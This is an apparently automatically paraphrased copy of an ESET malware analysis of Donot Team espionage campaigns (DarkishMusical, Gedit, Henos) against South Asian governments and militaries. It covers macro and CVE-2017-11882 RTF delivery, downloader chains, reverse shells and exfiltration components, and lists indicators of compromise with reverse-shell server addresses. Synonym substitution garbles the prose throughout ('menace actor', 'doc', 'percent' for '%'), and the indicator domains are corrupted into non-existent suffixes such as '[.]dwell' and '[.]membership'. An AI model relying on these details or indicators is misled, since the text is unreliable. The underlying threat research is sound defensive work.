ESET researchers take a deep look into latest assaults carried out by Donot Team all through 2020 and 2021, concentrating on authorities and army entities in a number of South Asian nations
Donot Team (also called APT-C-35 and SectorE02) is a menace actor working since at the least 2016 and identified for concentrating on organizations and people in South Asia with Windows and Android malware. A latest report by Amnesty International hyperlinks the group’s malware to an Indian cybersecurity firm that could be promoting the spyware and adware or providing a hackers-for-hire service to governments of the area.
We have been intently following the actions of Donot Team, and have traced a number of campaigns that leverage Windows malware derived from the group’s signature yty malware framework. According to our findings, the group may be very persistent and has constantly focused the identical organizations for at the least the final two years.
In this blogpost, we doc two variants of the malware utilized in latest campaigns – DarkishMusical and Gedit. For every of the variants, we analyze the entire assault chain and supply perception into how the group updates its instruments, techniques, and strategies.
Targets
The campaigns of Donot Team are motivated by espionage, utilizing their signature malware: the “yty” malware framework, whose important function is to gather and exfiltrate knowledge. According to our telemetry, Donot Team focuses on a small variety of targets in South Asia – Bangladesh, Sri Lanka, Pakistan and Nepal – as seen in Figure 1.
These assaults are centered on:
- Government and army organizations
- Ministries of Foreign Affairs
- Embassies
Going so far as concentrating on embassies of those nations in different areas, such because the Middle East, Europe, North America, and Latin America, can also be not exterior Donot Team’s realm.
Try, strive, strive once more
It’s not a rarity for APT operators to aim to regain entry to a compromised community after they’ve been ejected from it. In some instances that is achieved by the deployment of a stealthier backdoor that continues to be quiet till the attackers want it; in different instances they merely restart their operation with new malware or a variant of the malware they used beforehand. The latter is the case with Donot Team operators, solely that they’re remarkably persistent of their makes an attempt.
According to ESET telemetry, Donot Team has been constantly concentrating on the identical entities with waves of spearphishing emails with malicious attachments each two to 4 months. Interestingly, emails we have been in a position to retrieve and analyze did not present indicators of spoofing. Some emails have been despatched from the identical organizations that have been being attacked. It’s attainable that the attackers could have compromised the e-mail accounts of a few of their victims in earlier campaigns, or the e-mail server utilized by these organizations.
With spearphishing emails, the attackers use malicious Microsoft Office paperwork to deploy their malware. We have seen Donot Team utilizing at the least three strategies. One is macros in Word, Excel and PowerPoint paperwork, akin to the instance seen in Figure 2.
Figure 2. Malicious macro in a PowerPoint doc that drops a downloader executable and creates a scheduled job to run it
The second method is RTF information with .doc extensions that exploit reminiscence corruption vulnerability CVE‑2017‑11882 in Equation Editor, proven in Figure 3. These RTF paperwork additionally comprise two embedded DLLs as OLE objects (see Figure 4) which might be used to put in and obtain additional parts (each DLLs are described within the Gedit part). This permits the attackers to execute shellcode and requires no consumer interplay. The shellcode deploys the principle parts of the malware.
Figure 3. CLSID of the COM object utilized by the RTF doc to load the Equation Editor; the following OLE object comprises the CVE‑2017‑1182 exploit
Figure 4. The OLE object headers of the DLLs additionally embedded within the RTF doc
The third method is distant RTF template injection, which permits the attackers to have a payload downloaded from a distant server when the RTF doc is opened. This is achieved by inserting a URL within the optionally available *template management phrase of the RTF file format, as a substitute of the placement of a neighborhood file useful resource. The payload that Donot Team makes use of is one other doc that exploits CVE-2017-11882 and is loaded mechanically as soon as it’s downloaded. This is proven in Figure 5.
Figure 5. When Word opens an RTF file with a distant template, it mechanically makes an attempt to obtain the useful resource
The yty malware framework
Discovered by NetScout in 2018, the yty malware framework is a much less refined and poorly developed successor to an older framework known as EHDevel. The yty framework consists of a series of downloaders that finally obtain a backdoor with minimal performance, used to obtain and execute additional parts of Donot Team’s toolset.
These embody file collectors based mostly on file extension and yr of creation, display screen capturers, keyloggers, reverse shells, and extra. As seen in Figure 6, parts for exfiltration collect the collected intelligence from staging folders and add each file to a delegated server used just for this function.
Figure 6. Component that resolves the folder identify for staging JPEG screenshots (left) and exfiltration element that finds all information within the staging folder (proper)
Staging folder names and areas are modified with nearly each new marketing campaign, in addition to a few of the parts’ filenames. However, there are instances during which the names of parts have remained unchanged, for instance: gedit.exe, wuaupdt.exe, lmpss.exe, disc.exe, amongst others. As seen in Figure 7, evidently for each new marketing campaign, to be able to set new paths and filenames, these values should be modified within the supply code after which recompiled, as none of those parts use a configuration block or file.
Figure 7. Encrypted strings containing areas and filenames which might be often modified (high) and unencrypted values utilized in setting up the C&C URL (backside)
The malware makes use of scheduled duties for persistence, and alternates between DLL and EXE information between campaigns. In the case of DLLs, scheduled duties execute rundll32.exe to load them and execute one of many exported features.
The builders of the yty framework primarily depend on the C++ programming language. Likely in an try to evade detection, they’ve additionally ported their parts to different languages akin to VBScript, Python (packaged with PyInstaller), Visual C#, and AutoIt, amongst others. However, since 2019 we’ve got solely seen them leveraging parts programmed in C++ (Figure 8) and Go (Figure 9).
Figure 8. Decompiled code of the element that captures screenshots, initially written in C++
Figure 9. Decompiled code of the element that captures screenshots, for the model written in Go
The malware typically makes use of two or three servers throughout its deployment. It may use one server throughout its chain of downloaders and a unique server that the backdoor contacts to be able to obtain its instructions and obtain additional parts, or use the identical server for each functions. A distinct server is all the time used for the add of collected info. In some assaults Donot Team has reused C&C domains from earlier assaults – each for downloads and exfiltration. As seen in Figure 10, Figure 11 and Figure 12, these parts – later described as a variant we monitor as DarkishMusical – utilized in the identical assault, employed three totally different C&C domains.
Figure 10. The first downloader decrypts the URL of the server from which it downloads the following stage of the chain
Figure 11. In later levels, the backdoor makes use of a unique server for C&C communications
Figure 12. The exfiltration parts use but a 3rd server to add the collected information
Timeline of assaults
Here we describe the malware variants utilized in latest Donot Team campaigns, with a give attention to their Windows malware, ranging from September 2020 till October 2021. For readability, we’ve got separated them into two variants of the yty malware framework: Gedit and DarkishMusical, with one particular marketing campaign utilizing Gedit that we named Henos.
In Figure 13, we current a timeline, in accordance with our telemetry, of the assaults. Also on our timeline we’ve got included assaults from one other variant, referred to as the “Jaca framework”. However, we’ll not describe it right here because it has been described extensively on this report by CN-SEC.
Figure 13. Timeline of Donot Team assaults from September 2020 to October 2021 in accordance with ESET telemetry
DarkishMusical
According to ESET telemetry, the primary wave of assaults the place this variant was used occurred in June 2021, concentrating on army organizations in Bangladesh. We have been solely in a position to get better its chain of downloaders and its important backdoor. Given the small variety of victims, we consider this might need been a extremely focused assault.
In September, a second wave of assaults that focused army organizations in Nepal used new C&C servers and file and staging folder names. We have been in a position to get better plenty of parts downloaded by the backdoor, so we’ve got determined to explain these assaults as a substitute.
Spearphishing emails have been despatched with PowerPoint paperwork containing a macro that deploys the primary element of a series of downloaders and persists utilizing a scheduled job. When potential victims open these paperwork, they are going to be introduced with a faux error message, as seen in Figure 14, and the paperwork will stay devoid of any seen content material.
Figure 14. Screenshot of a clean, malicious PowerPoint doc
As seen in Figure 15, the chain of downloaders goals to obtain a remaining element that works as a backdoor with minimal performance: it downloads standalone parts, executes them utilizing the ShellExecute Windows API, get and saves new C&C URLs.
The backdoor downloads the parts that deal with the gathering and exfiltration of data to a devoted server. These parts do not talk with the backdoor or the C&C to report on their actions – relatively, they use a delegated folder for the staging of the information, and a separate exfiltration element will acquire the whole lot and add it.
Figure 15. Observed chain of compromise for DarkishMusical
We determined to name this marketing campaign DarkishMusical due to the names the attackers selected for his or her information and folders: many are western celebrities or characters within the film High School Musical. Table 1 briefly describes the aim of every of the parts within the chain of compromise.
Table 1. Components within the DarkishMusical marketing campaign chain of compromise
| Filename | Description |
|---|---|
| rihana.exe | This executable is dropped by the malicious doc to %public%Musicrihana.exe and persistence established by way of a scheduled job known as musudt. Downloads file to %public%Musicacrobat.dll and drops a BAT file to %public%Musicsidilieicaliei.bat. The BAT file calls schtasks.exe to create the hmomci scheduled job to execute |
| acrobat.dll | Downloads file and saves it as %public%Musicswift Additionally, can concern a systeminfo.exe command whose output is redirected to %public%Musicjustin. The contents of the file are despatched to its C&C server. Drops and executes the file %public%Musicjanifer.bat that performs a number of duties: • Creates two scheduled duties: - sccmos to execute %public%MusicTroyforbidden.exe - msoudatee that executes %public%MusicGabriellakeep in mind.exe • Moves the swift file into the Gabriella folder and renames it to keep in mind.exe • Attempts to delete acrobat.dll and rihana.exe • Deletes the scheduled duties named hmomci and musudt • Deletes itself |
| keep in mind.exe | Downloads file to %public%MusicTroyforbidden.exe |
| forbidden.exe | Uses the URL saved in %public%MusicTaylorflag file; if there isn’t a URL, it makes use of its default URL. Accepts three instructions: • Set URL within the flag file • Execute file with ShellExecute Windows API • Download file to %public%MusicTaylor |
In Table 2 we describe the aim of every element of the attacker’s toolset.
Table 2. Description of parts within the attacker’s toolset for DarkishMusical
| Filename | Description |
|---|---|
| serviceup.exe | Reverse shells |
| sdudate.exe | |
| srcot.exe | Takes screenshots, saves them to %public%MusicSymphony |
| Three variants of nDExiD.exe | Collects information created in 2021 and after, and copies them to the staging folder %public%MusicSymphony
Collects information by extension: doc, docx, eml, inp, jpeg, jpg, msg, odt, pdf, pps, ppsx, ppt, pptx, rtf, txt, xls, xlsx |
| Same as above, however information should have been created in 2020 or after. | |
| File collector that screens insertion of USB drives and adjustments throughout the file system. Collects the identical paperwork by extension as above, but additionally contains information with extensions: docm, mbox, pst | |
| upsvcsu.exe | Exfiltrates collected information.
Enumerates all information in %public%MusicSymphony and uploads those who match the extensions: doc, docx, eml, inp, jpeg, jpg, msg, odt, pdf, pps, ppsx, ppt, pptx, rtf, txt, xls, xlsx |
Gedit
We detected the primary assaults of the marketing campaign utilizing Gedit in September 2020, in opposition to organizations in Pakistan that had already been focused with spearphishing and malicious RTF paperwork that put in the Jaca framework. Since then, Donot Team moved on to give attention to targets in Bangladesh, Nepal and Sri Lanka. The malware is clearly derived from the yty malware framework, however it’s distinct sufficient to be separated from DarkishMusical.
We have been in a position to retrieve a spearphishing e mail similar to a Gedit marketing campaign that occurred in February of 2021, which is proven in Figure 16. The first attachment contained a listing of personnel from a army entity in Bangladesh (and no malicious content material). The second attachment confirmed nothing however a clean web page, whereas executing malicious code.
Figure 16. Screenshot of a spearphishing e mail despatched by the attackers
We can see that the scale of the second file is larger than 2 MB. It is an RTF file that exploits CVE-2017-11882 to drop two DLL information contained within the doc and execute considered one of them. Other parts are downloaded to the compromised laptop in varied levels. An overview of this assault chain and its malware parts is proven in Figure 17.
Figure 17. Chain of compromise in Gedit campaigns
The parts have been coded in Go, and C++ (with MinGW and Visual Studio compilers). We have chosen to explain the parts utilized in that marketing campaign in February 2021, that are proven in Table 3.
Table 3. Description of parts for Gedit variant
| Filename | Description |
|---|---|
| vbtr.dll | Moves the file %TEMPpercentbcs01276.tmp to %USERPROFILE%Documentsmsdn022.dll
Creates a scheduled job MobUpdate to execute |
| msdn022.dll | Downloads a file to %APPDATApercentmscx01102 (later renamed to Winhlp.exe).
Writes and executes %APPDATApercentcheck.bat, which: |
| Winhlp.exe | Downloads a file to %USERPROFILEpercentinfboostOOOnprint.exe (if it doesn’t exist or its dimension is lower than 50 kB). |
| nprint.exe | Sends a request to a server and relying on the reply, three actions will be carried out: • If qwertyuiop is within the reply headers, then a file is downloaded to • If asdfghjklzx is within the reply headers, then it tries to execute • If zxcvbnmlkjhgfd is within the reply headers, then it tries to execute If a file |
| wuaupdt.exe | Reverse shell. |
| lmpss.exe | Takes screenshots and saves them, in an infinite loop, to %USERPROFILEpercentRemoteDeskApps |
| innod.exe | File collector. Iterates recursively by drives, logging attention-grabbing information to Seeks information with the extensions: doc, docx, xls, xlsx, ppt, pps, pptx, ppsx, pdf, inp, msg, jpg, jpeg, png, txt Excludes the next information/folders: ., .., nohiucf, Windows, Recent Places, Temfile, Program Files, Program Files (x86), ProgramData, Microsoft, Package Cache This element runs in an infinite loop, iterating drives from C: to H: |
| gedit.exe | Sends collected information to a server. All information which might be in %USERPROFILEpercentRemoteDeskApps are despatched one after the other, unencrypted. There is not any examine for extension, aside from excluding . and ..
The sufferer identifier that was written to %USERPROFILE%Policyen-usFileswizard is appended to the URL. If the file doesn’t exist, then the default string HeloBSiamabcferss is used as a substitute. User-agent is: It creates a system occasion aaaaaaaaa to be sure that just one occasion of the element is working at a time. |
Henos marketing campaign
Finally, it’s price mentioning a wave of assaults that occurred between February and March 2021, concentrating on army organizations in Bangladesh and Sri Lanka. These assaults used the Gedit variant of the malware, however with some minor modifications. Therefore, we determined to call this marketing campaign Henos in our timeline, after its backdoor DLL – henos.dll.
Samples belonging to parts of this wave of assaults have been additionally reported on-line in February, which most likely explains why the group didn’t use the parts once more (see this tweet by Shadow Chaser Group researchers, for instance).
Although we didn’t discover the corresponding spearphishing emails or malicious paperwork, the assault chain is presumably the identical as we described above, with some minor variations in how the parts are executed. An overview of that is proven in Figure 18.
Figure 18. Chain of compromise of the Henos marketing campaign
While a few of the parts of this marketing campaign are named javatemp.exe and pytemp.exe, these filenames have been most likely solely chosen in an try to mimic official software program akin to Java or Python. While pytemp.exe and plaapas.exe have been coded within the Go language, javatemp.exe was coded in C++ (compiled with MinGW).
One remaining observe is that the element that performs exfiltration of information, pytemp.exe, performs a examine to see if gedit.exe is working. If two or extra situations are discovered, it exits. We consider this can be a mistake by the programmers, because it ought to examine for pytemp.exe as a substitute. However, this straightforward mistake helps us tie the Henos marketing campaign to the Gedit variant of the malware (added to code similarity).
Conclusion
Donot Team makes up for its low sophistication with tenacity. We count on that it’ll proceed to push on no matter its many setbacks. Only time will inform if the group evolves its present TTPs and malware.
For any inquiries, or to make pattern submissions associated to the topic, contact us at [email protected].
Indicators of Compromise (IoCs)
A complete listing of Indicators of Compromise (IoCs) and samples will be present in our GitHub repository.
Gedit – October 2021
Samples
| SHA-1 | Filename | ESET detection identify |
|---|---|---|
| 78E82F632856F293BDA86D77D02DF97EDBCDE918 | cdc.dll | Win32/TrojanDownloader.Donot.C |
| D9F439E7D9EE9450CD504D5791FC73DA7C3F7E2E | wbiosr.exe | Win32/TrojanDownloader.Donot.D |
| CF7A56FD0613F63418B9DF3E2D7852FBB687BE3F | vdsc.exe | Win32/TrojanDownloader.Donot.E |
| B2263A6688E512D90629A3A621B2EE003B1B959E | wuaupdt.exe | Win32/ReverseShell.J |
| 13B785493145C85B005E96D5029C20ACCFFE50F2 | gedit.exe | Win32/Spy.Donot.A |
| E2A11F28F9511753698BA5CDBAA70E8141C9DFC3 | wscs.exe | Win32/Spy.Donot.B |
| F67ABC483EE2114D96A90FA0A39496C42EF050B5 | gedit.exe | Win32/Spy.Donot.B |
Network
Download servers
- https://request.soundedge[.]dwell/entry/nasrzolofuju
- https://request.soundedge[.]dwell/entry/birkalirajliruajirjiairuai
- https://share.printerjobs[.]xyz/id45sdjscj/
Exfiltration server
- https://submin.seasonsbackup[.]xyz/backup/
Reverse shell server
Gedit – July 2021
Samples
| SHA-1 | Filename | ESET detection identify |
|---|---|---|
| A71E70BA6F3CD083D20EDBC83C72AA823F31D7BF | hxedit.exe | Win32/TrojanDownloader.Donot.N |
| E101FB116F05B7B69BD2CAAFD744149E540EC6E9 | lmpss.exe | Win64/HackTool.Ligolo.A |
| 89D242E75172C79E2F6FC9B10B83377D940AE649 | gedit.exe | WinGo/Spy.Donot.A |
| B42FEFE2AB961055EA10D445D9BB0906144647CE | gedit.exe | WinGo/Spy.Donot.A |
| B0704492382186D40069264C0488B65BA8222F1E | disc.exe | Win32/Spy.Donot.L |
| 1A6FBD2735D3E27ECF7B5DD5FB6A21B153FACFDB | disc.exe | Win32/Spy.Donot.A |
| CEC2A3B121A669435847ADACD214BD0BE833E3AD | disc.exe | Win32/Spy.Donot.M |
| CBC4EC0D89FA7A2AD1B1708C5A36D1E304429203 | disc.exe | Win32/Spy.Donot.A |
| 9371F76527CA924163557C00329BF01F8AD9E8B7 | gedit.exe | Win32/Spy.Donot.J |
| B427744B2781BC344B96907BF7D68719E65E9DCB | wuaupdt.exe | Win32/TrojanDownloader.Donot.W |
Network
Download server
- request.submitonline[.]membership/orderme/
Exfiltration servers
- oceansurvey[.]membership/add/
- request.soundedge[.]dwell/
/uload
Reverse shell servers
- 80.255.3[.]67
- 37.48.122[.]145
Gedit – February/March 2021
Samples
| SHA-1 | Filename | ESET detection identify |
|---|---|---|
| A15D011BED98BCE65DB597FFD2D5FDE49D46CFA2 | BN_Webmail_List 2020.doc | Win32/Exploit.Agent.UN |
| 6AE606659F8E0E19B69F0CB61EB9A94E66693F35 | vbtr.dll | Win32/Spy.Donot.G |
| 0290ABF0530A2FD2DFB0DE29248BA3CABB58D2AD | bcs01276.tmp (msdn022.dll) | Win32/TrojanDownloader.Donot.P |
| 66BA21B18B127DAA47CB16AB1F2E9FB7DE3F73E0 | Winhlp.exe | Win32/TrojanDownloader.Donot.J |
| 79A5B10C5214B1A3D7CA62A58574346C03D54C58 | nprint.exe | Win32/TrojanDownloader.Donot.Okay |
| B427744B2781BC344B96907BF7D68719E65E9DCB | wuaupdt.exe | Win32/TrojanDownloader.Donot.W |
| E423A87B9F2A6DB29B3BA03AE7C4C21E5489E069 | lmpss.exe | WinGo/Spy.Donot.B |
| F43845843D6E9FB4790BF70F1760843F08D43790 | innod.exe | Win32/Spy.Donot.G |
| 4FA31531108CC68FF1865E2EB5654F7B3DA8D820 | gedit.exe | Win32/Spy.Donot.G |
Network
Download servers
- agency.tplinkupdates[.]area/8ujdfuyer8d8f7d98jreerje
- agency.tplinkupdates[.]area/yu37hfgde64jskeruqbrgx
- area.lovingallupdates[.]life/orderme
Exfiltration server
- oceansurvey.membership/add/
Reverse shell server
Gedit – September 2020
Samples
| SHA-1 | Filename | ESET detection identify |
|---|---|---|
| 49E58C6DE5245796AEF992D16A0962541F1DAE0C | lmpss.exe | Win32/Spy.Donot.H |
| 6F38532CCFB33F921A45E67D84D2796461B5A7D4 | prodot.exe | Win32/TrojanDownloader.Donot.Okay |
| FCFEE44DA272E6EB3FC2C071947DF1180F1A8AE1 | prodot.exe | Win32/TrojanDownloader.Donot.S |
| 7DDF48AB1CF99990CB61EEAEB3ED06ED8E70A81B | gedit.exe | Win32/TrojanDownloader.Donot.AA |
| DBC8FA70DFED7632EA21B9AACA07CC793712BFF3 | disc.exe | Win32/Spy.Donot.I |
| CEF05A2DAB41287A495B9413D33F14D94A568C83 | wuaupdt.exe | Win32/Spy.Donot.A |
| E7375B4F37ECEA77FDA2CEA1498CFB30A76BACC7 | prodot.exe | Win32/TrojanDownloader.Donot.AA |
| 771B4BEA921F509FC37016F5FA22890CA3338A65 | apic.dll | Win32/TrojanDownloader.Donot.A |
| F74E6C2C0E26997FDB4DD89AA3D8BD5B270637CC | njhy65tg.dll | Win32/TrojanDownloader.Donot.O |
Network
Download servers
- soundvista[.]membership/sessionrequest
- soundvista[.]membership/orderme/
- soundvista[.]membership/winuser
Exfiltration server
- request.resolverequest[.]dwell/add/
–
Reverse shell server
DarkishMusical – September 2021
Samples
| SHA-1 | Filename | ESET detection identify |
|---|---|---|
| 1917316C854AF9DA9EBDBD4ED4CBADF4FDCFA4CE | rihana.exe | Win32/TrojanDownloader.Donot.G |
| 6643ACD5B07444D1B2C049BDE61DD66BEB0BD247 | acrobat.dll | Win32/TrojanDownloader.Donot.F |
| 9185DEFC6F024285092B563EFA69EA410BD6F85B | keep in mind.exe | Win32/TrojanDownloader.Donot.H |
| 954CFEC261FEF2225ACEA6D47949D87EFF9BAB14 | forbidden.exe | Win32/TrojanDownloader.Donot.I |
| 7E9A4A13A76CCDEC880618BFF80C397790F3CFF3 | serviceup.exe | Win32/ReverseShell.J |
| BF183A1EC4D88034D2AC825278FB084B4CB21EAD | srcot.exe | Win32/Spy.Donot.F |
| 1FAA4A52AA84EDB6082DEA66F89C05E0F8374C4C | upsvcsu.exe | WinGo/Spy.Donot.A |
| 2F2EA73B5EAF9F47DCFB7BF454A27A3FBF253A1E | sdudate.exe | Win32/ReverseShell.J |
| 39F92CBEC05785BF9FF28B7F33906C702F142B90 | ndexid.exe | Win32/Spy.Donot.C |
| 1352A8394CCCE7491072AAAC9D19ED584E607757 | ndexid.exe | Win32/Spy.Donot.E |
| 623767BC142814AB28F8EC6590DC031E7965B9CD | ndexid.exe | Win32/Spy.Donot.A |
Network
Download servers
- digitalresolve[.]dwell/
~ ~ /ekcvilsrkjiasfjkikiakik - digitalresolve[.]dwell/
~ ~ /ziuriucjiekuiemoaeukjudjkgfkkj - digitalresolve[.]dwell/
~ ~ /Sqieilcioelikalik - printersolutions[.]dwell/
~ ~ /orderme
Exfiltration server
- packetbite[.]dwell/
~ ~ /uload
Reverse shell servers
- 37.120.198[.]208
- 51.38.85[.]227
DarkishMusical – June 2021
Samples
| SHA-1 | Filename | ESET detection identify |
|---|---|---|
| BB0C857908AFC878CAEEC3A0DA2CBB0A4FD4EF04
6194E0ECA5D494980DF5B9AB5CEA8379665ED46A |
ertficial.dll | Win32/TrojanDownloader.Donot.X |
| ACB4DF8708D21A6E269D5E7EE5AFB5168D7E4C70 | msofficedll.dll | Win32/TrojanDownloader.Donot.L |
| B38F3515E9B5C8F4FB78AD17C42012E379B9E99A | sccmo.exe | Win32/TrojanDownloader.Donot.M |
| 60B2ADE3B339DE4ECA9EC3AC1A04BDEFC127B358 | pscmo.exe | Win32/TrojanDownloader.Donot.I |
Network
Download servers
- biteupdates[.]dwell/
~ ~ /orderme - biteupdates[.]dwell/
~ ~ /KdkdUe7KmmGFD - biteupdates[.]dwell/
~ ~ /acdfsgbvdghd - dataupdates[.]dwell/
~ ~ /DKixeXs44skdqqD - dataupdates[.]dwell/
~ ~ /BcX21DKixeXs44skdqqD
Henos – February/March 2021
Samples
| SHA-1 | Filename | ESET detection identify |
|---|---|---|
| 468A04B358B780C9CC3174E107A8D898DDE4B6DE | Procurement Letter Feb 21.doc | Win32/Exploit.CVE-2017-11882.CP |
| 9DD042FC83119A02AAB881EDB62C5EA3947BE63E | ctlm.dll | Win32/Spy.Donot.N |
| 25825268868366A31FA73095B0C5D0B696CD45A2 | stpnaqs.pmt (jptvbh.exe) | Win32/TrojanDownloader.Donot.Z |
| 540E7338725CBAA2F33966D5C1AE2C34552D4988 | henos.dll | Win32/Spy.Donot.G |
| 526E5C25140F7A70BA9F643ADA55AE24939D10AE | plaapas.exe | WinGo/Spy.Donot.B |
| 89ED760D544CEFC6082A3649E8079EC87425FE66 | javatemp.exe | Win32/Spy.Donot.G |
| 9CA5512906D43EB9E5D6319E3C3617182BBF5907 | pytemp.exe | WinGo/Spy.Donot.A |
Network
Download servers
- data.printerupdates[.]on-line/
/Xddv21SDsxDl - data.printerupdates[.]on-line/
~ /XddvInXdl - data.printerupdates[.]on-line/
~ /ZuDDey1eDXUl - data.printerupdates[.]on-line/
~ /Vyuib45xzlqn
Exfiltration server
- https://handle.biteupdates[.]web site/
/uload
MITRE ATT&CK strategies
This desk was constructed utilizing version 10 of the ATT&CK framework.
| Tactic | ID | Name | Description |
|---|---|---|---|
| Resource Development | T1588.005 | Obtain Capabilities: Exploits | Donot Team has used CVE‑2017-11882 exploits to run its first-stage malware. |
| Initial Access | T1566.001 | Phishing: Spearphishing Attachment | Donot Team has despatched spearphishing emails to its victims with malicious Word or PowerPoint attachments. |
| Execution | T1204.002 | User Execution: Malicious File | Donot Team has lured its victims into opening malicious e mail attachments. |
| T1059.005 | Command and Scripting Interpreter: Visual Basic | Donot Team has used macros contained in Power Point paperwork. | |
| T1059.003 | Command and Scripting Interpreter: Windows Command Shell | Donot Team has used reverse shells on the system to execute instructions. | |
| T1203 | Exploitation for Client Execution | Donot Team has used CVE-2017-11882 exploits to execute code on the sufferer’s machine. | |
| Persistence | T1053.005 | Scheduled Task/Job: Scheduled Task | Donot Team has created scheduled duties for persistence of its malicious parts. |
| Defense Evasion | T1036.005 | Masquerading: Match Legitimate Name or Location | Donot Team has used filenames akin to pytemp or javatemp to approximate the identify of official software program. |
| Discovery | T1057 | Process Discovery | Donot Team has applied checks for older variations of the malware working on the sufferer’s system. |
| Lateral Movement | T1534 | Internal Spearphishing | Donot Team has despatched spearphishing emails to their victims that got here from throughout the similar focused group. |
| Collection | T1005 | Data from Local System | Donot Team has used malicious modules that traverse the sufferer’s filesystem in search of information with varied extensions. |
| T1025 | Data from Removable Media | Donot Team has used a malicious module to repeat information from detachable drives. | |
| T1074.001 | Data Staged: Local Data Staging | Donot Team has staged information for exfiltration in a single location, a folder within the sufferer’s laptop. | |
| T1113 | Screen Capture | Donot Team has used malicious modules to take screenshots from victims. | |
| Command and Control | T1071.001 | Application Layer Protocol: Web Protocols | Donot Team has used HTTP/S for C&C communications and knowledge exfiltration. |
| Exfiltration | T1048.003 | Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | Donot Team has used devoted servers for exfiltration, sending the information over HTTP or HTTPS, unencrypted. |
https://www.welivesecurity.com/2022/01/18/donot-go-do-not-respawn/
